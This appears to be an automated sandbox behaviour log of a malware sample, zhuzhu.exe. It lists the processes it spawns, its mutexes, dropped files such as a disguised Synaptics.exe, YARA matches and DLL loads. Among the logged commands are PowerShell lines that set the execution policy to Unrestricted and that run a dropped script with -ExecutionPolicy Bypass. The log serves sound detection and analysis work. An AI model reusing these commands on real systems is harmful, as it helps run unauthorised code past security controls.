                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile created: C:\Users\user\Desktop\._cache_zhuzhu.exeJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeMutant created: \Sessions\1\BaseNamedObjects\Xoreax_LogMutex_._cache_zhuzhu
                                      Source: C:\Users\user\Downloads\inst.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 7556
                                      Source: C:\Users\user\Downloads\inst.exeMutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 7448
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5780
                                      Source: C:\Users\user\Downloads\inst.exeMutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeMutant created: \Sessions\1\BaseNamedObjects\Global\XoreaxIncredibuild_._cache_zhuzhu_Mutex
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3068:120:WilError_03
                                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12. 3
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeMutant created: \Sessions\1\BaseNamedObjects\XoreaxIncredibuild_._cache_zhuzhu_Mutex_user_WinSta0
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\FHfEA7As.xlsmJump to behavior
                                      Source: Yara matchFile source: zhuzhu.exe, type: SAMPLE
                                      Source: Yara matchFile source: 1.2.._cache_zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 0.0.zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.0.._cache_zhuzhu.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000001.00000002.1772641629.0000000000403000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000001.00000000.1663851009.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000000.1657356123.00000000004A5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                                      Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE77E.tmp, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\Desktop\._cache_zhuzhu.exe, type: DROPPED
                                      Source: C:\Users\user\Desktop\zhuzhu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                      Source: zhuzhu.exeVirustotal: Detection: 83%
                                      Source: zhuzhu.exeReversingLabs: Detection: 92%
                                      Source: ._cache_zhuzhu.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
                                      Source: ._cache_zhuzhu.exeString found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
                                      Source: ._cache_zhuzhu.exeString found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
                                      Source: ._cache_zhuzhu.exeString found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
                                      Source: inst.exeString found in binary or memory: /pid=%s /noreboot=1 /installer=1 /SMARTSILENCE
                                      Source: inst.exeString found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
                                      Source: inst.exeString found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
                                      Source: zhuzhu.exeString found in binary or memory: -ADDCUSTOMCOLORBUTTON_CAP=Add to Custom Colors
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile read: C:\Users\user\Desktop\zhuzhu.exeJump to behavior
                                      Source: unknownProcess created: C:\Users\user\Desktop\zhuzhu.exe "C:\Users\user\Desktop\zhuzhu.exe"
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\Users\user\Desktop\._cache_zhuzhu.exe "C:\Users\user\Desktop\._cache_zhuzhu.exe"
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeProcess created: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe "C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe"
                                      Source: unknownProcess created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: unknownProcess created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\Users\user\Desktop\._cache_zhuzhu.exe "C:\Users\user\Desktop\._cache_zhuzhu.exe" Jump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeProcess created: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe "C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe" Jump to behavior
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: version.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: wsock32.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: netapi32.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: twext.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: policymanager.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: msvcp110_win.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: ntshrui.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: cscapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: shacct.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: twinapi.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: idstore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: samlib.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: starttiledata.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: acppage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: sfc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: msi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: aepic.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: sfc_os.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: wlidprov.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: samcli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: provsvc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: twext.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: ntshrui.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: starttiledata.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: acppage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: sfc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: msi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: aepic.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\zhuzhu.exeSection loaded: sfc_os.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: version.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: wsock32.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: msimg32.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: dwmapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: msvcp140.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: vcruntime140.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: twext.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: policymanager.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: msvcp110_win.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: ntshrui.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: cscapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: twinapi.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: starttiledata.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: acppage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: sfc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: msi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: aepic.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: sfc_os.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: shacct.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: idstore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: samlib.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: wlidprov.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: samcli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: provsvc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: textinputframework.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: coreuicomponents.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: schannel.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: mskeyprotect.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: ntasn1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: msasn1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: dpapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: rsaenh.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: gpapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: ncrypt.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: ncryptsslp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: msv1_0.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: ntlmshared.dllJump to behavior
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeSection loaded: cryptdll.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: wsock32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msimg32.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: dwmapi.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: msvcp140.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: vcruntime140.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeSection loaded: winmm.dll
